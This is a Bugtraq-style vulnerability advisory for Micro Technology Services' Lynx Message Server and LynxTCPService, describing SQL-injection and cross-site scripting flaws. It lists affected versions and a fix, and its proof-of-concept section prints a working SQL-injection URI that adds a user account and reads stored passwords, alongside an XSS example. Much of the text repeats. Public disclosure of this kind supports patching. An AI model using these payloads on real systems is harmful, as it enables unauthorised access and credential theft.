Multiple Micro Technology Services Products Cross Site Scripting and SQL Injection Vulnerabilities
BID:53383
Info
Multiple Micro Technology Services Products Cross Site Scripting and SQL Injection Vulnerabilities
| Bugtraq ID: | 53383 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 03 2012 12:00AM |
| Updated: | May 03 2012 12:00AM |
| Credit: | Mark Lachniet and David Reflexia |
| Vulnerable: |
Micro Technology Services LynxTCPService 1.1.62 Micro Technology Services Lynx Message Server 7.11.10.2 |
| Not Vulnerable: |
Micro Technology Services Lynx Message Server 7.12.4.1 |
Discussion
Multiple Micro Technology Services Products Cross Site Scripting and SQL Injection Vulnerabilities
Multiple Micro Technology Services products are prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following Micro Technology Services products are vulnerable:
Lynx Message Server 7.11.10.2
LynxTCPService 1.1.62
Multiple Micro Technology Services products are prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following Micro Technology Services products are vulnerable:
Lynx Message Server 7.11.10.2
LynxTCPService 1.1.62
Exploit / POC
Multiple Micro Technology Services Products Cross Site Scripting and SQL Injection Vulnerabilities
An attacker can use a browser to exploit these issues. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URI's are available:
http://www.example.com/cgi/email_password.plx?UserID=a'%3BINSERT+INTO+Users([User],[Password])+VALUES+('bede','bede')%3Bselect+Users.[Password],+Users.[User]+from+USERS+where+Users.[User]='b
http://example.com//cgi/wrapper.plx?Destination=addequipment.htm&Title=[XSS]
An attacker can use a browser to exploit these issues. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URI's are available:
http://www.example.com/cgi/email_password.plx?UserID=a'%3BINSERT+INTO+Users([User],[Password])+VALUES+('bede','bede')%3Bselect+Users.[Password],+Users.[User]+from+USERS+where+Users.[User]='b
http://example.com//cgi/wrapper.plx?Destination=addequipment.htm&Title=[XSS]
Solution / Fix
Multiple Micro Technology Services Products Cross Site Scripting and SQL Injection Vulnerabilities
Solution:
Updates are available. Please see the reference for more details.
Solution:
Updates are available. Please see the reference for more details.
References
Multiple Micro Technology Services Products Cross Site Scripting and SQL Injection Vulnerabilities
References:
References:
- Lynx System Homepage (Micro Technology Services)
- SQL Injection and other issues in Micro Technology Services, Inc. Lynx ([email protected])